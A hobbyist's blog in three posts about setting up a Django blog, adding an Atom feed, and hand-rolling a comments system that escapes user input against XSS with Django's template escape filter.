the elusive commenting system

BDT (yeah, third post in, already acronym-ising this thing) finally has one of them there commenting systems. Check it out below if you don’t believe me.

The delay

The reason I was holding back was because I wanted to “hand-roll” my system for maximum control. Yeah, this is a gross violation of “don’t reinvent the wheel” (Django has a comments module), but sometimes invention is fun even if you’re contributing nothing new to anything. My main motivation for spitting in the face of Django was because at some stage I want to play with Akismet. There are tutorials out there for adding Akismet using the existing comments system, however they all involve altering core Django code and I sorta felt that this could be a bit messy – particularly in terms of maintenance further down the line.

The problem

The Django API makes it a breeze to add a comment, the big problem comes in escaping stray html / javascript etc. I could write my own sanitiser – it probably wouldn’t be all that hard, but I would never want to reinvent the wheel (I’m banking on 90% of readers skimming the last paragraph). The only method out there in Django seems to be that in the template system – and that’s only going to be directly useful in sanitising the main blog page, and only then if I explicitly tell it to on every template. It won’t stop somebody from submitting some code and it messing about with my admin page, for example. But the method itself is useful, it is powerful and in one command it can strip a string of any potential offensiveness (by offensiveness I mean XSS etc, not the word, “dick” – we wouldn’t want to prevent people from commenting about their favourite British pudding now, would we?).

The solution

PS I have stumbled upon this idea in surfing, but cannot remember where, if you were the originator, tell me and I’ll give due credit.

To harness the escape method, first you need to hook into the django.template module – specifically looking for the Parser class (I was stumbling about aimlessly in the python shell when I finally cracked this one, there is probably a better way of doing this). From an instance of the Parser class you execute the find_filter method to return the escape function, which you can then use at will. So, sticking this in your “add a comment” view-method-thing would look a little like this:

from django.template import Parser

...ace django code goes here...

p = Parser("you could probably put anything in here, I should probably try looking for a static class or something more efficient")
esc = p.find_filter("escape")
new_comment.content = esc(new_comment.content)

...more ace django code...

note to self: find / implement a “code” template module. Preferably with syntax highlighting built in.

obviously, you’ll want to do some content checks and the like, but you get the general idea. I am of the opinion that if you are not super paranoid about what you let into an effectively open database then you are asking for trouble. If you need further proof (beyond common sense), look at all of the trouble myspace have had over the years.

Still to come…

hmmmm, somehow this has formed itself into BDT’s first “proper” entry, I should probably have planned it better. Anyway, next on my list are per-category feeds, a bit of an “about” section and then some playing with Django vs Jabber interactivity. Should be fun, yay!


keeping this thing updated

…is a royal pain in the bollock. Figure I should give a small checklist of what Si has been working on:

XML Feed

I have just finished implementing an Atom feed for this mofo. It was ridiculously simple using Django – create a feed class, point the url file at it and you’re away. I think I will have to stick some per-category feeds in because that was waaaay too easy

Comments System

I am working on getting a comments system sorted ASAP, I think the power of blogging is in the dialogue – without it you have a glorified ego-wank. The aforementioned feed will not be going live until this is all cleared and working.

Super hyper mega WEB APP!!!

Hayley and me – we had one of them $5 ideas* that she swears is gonna make her us a million. I am not so sure. I just want to be able to say that I have successfully deployed a working web application, rather than being a dumb simpleton who has no idea of the rigeurs involved. The app itself is pretty useless to anyone not of the myspace generation and it took me just 45 minutes to manufacture a proof of concept (again – thanks to my boyfriend, Django) – but there is always a chance that Fox will give me £50 for it within the next 10 months, therefore making me a profit on my hosting. Wooyay.

* ok, it’s probably closer to 50p.

So yeah – still plenty on my plate, next post will hopefully about this mysterious wAPP (saying it aloud like that is strangely satisfying), if not inviting you – my non-readers – to leave a comment.


And so it begins

Yup – a pretty uninspired first post title, and what’s probably going to be an equally uninspired first post – but what the heck, I don’t see people reading this for a while now anyway. Basically I have been pissing about with various development tools on my own boxes for about 9 months now, I’ve gone through everything – PHP, Python, Ruby, Codeigniter, CakePHP, Dotnet, Visual Studio, Eclipse, VIM, Aptana… I’ve experimented with lots of different types of programming – AI, GUI, Linux, Win32, server-side, client-side, IM bots, games… and I’ve decided it’s about time I started putting stuff out there myself instead of leeching off of others’ hard sweat. With stuff being, “mistakes I have made that others may not have to”.

Python, Django Vim…I choose you!

Having battled through, I have finally achieved my desired set-up – or at least the one I am going to pursue for personal development in the forseeable future. My lingo of choice is Python – I have selected it because it feels like I can simply imagine code and it works. I like that. I’m not arsed about speed or any of those BS metrics, I just want to see stuff happen. (Although I have never had any troubles with Python regarding those sorts of things either.)

I planned on trying all of the Python frameworks (Turbogears, CherryPy, Zope etc.) but with Django it was love at first sight. It was so easy that it felt like cheating, and I am not one to feel guilty for living an easier life. If PHP was my only choice then Codeigniter would have been my way forward, but Python / Django seems to be gaining more acceptance with hosts and that looks to further pick up as it reaches that magical 1.0 release.

I have been really perservering with VIM for a while now and am now seeing the results. I wanted an editor which I could customise in any way I want, and having upgraded to version 7 I really don’t see anything it won’t let me do….Expect some scripts of beyond-dubious quality to be published on here as I start scripting stuff which I haven’t just ripped off some innocent French dude.

And finally…

Posts will inevitably stray off topic so don’t subscribe if you want pure technical writing (HAHAHAHA!!!!). Fanboyism is a disease – I consider myself OS-agnostic (they’re all quite pretty now, it all comes down to what I can afford / steal easily). I’m not big on memes – if there are 5 things you don’t know about me it is simply because I don’t want you to. The design of this blog will improve / change / mutate incrementally (with emphasis on the third, fourth and fifth syllables of that word) as I add features, currently I have just stuck in the bare bones. There’s not even an RSS feed yet let alone any sort of commenting. I won’t start pushing this / linking back until at LEAST those two features are implemented.

Last night I: signed up for hosting with webfaction.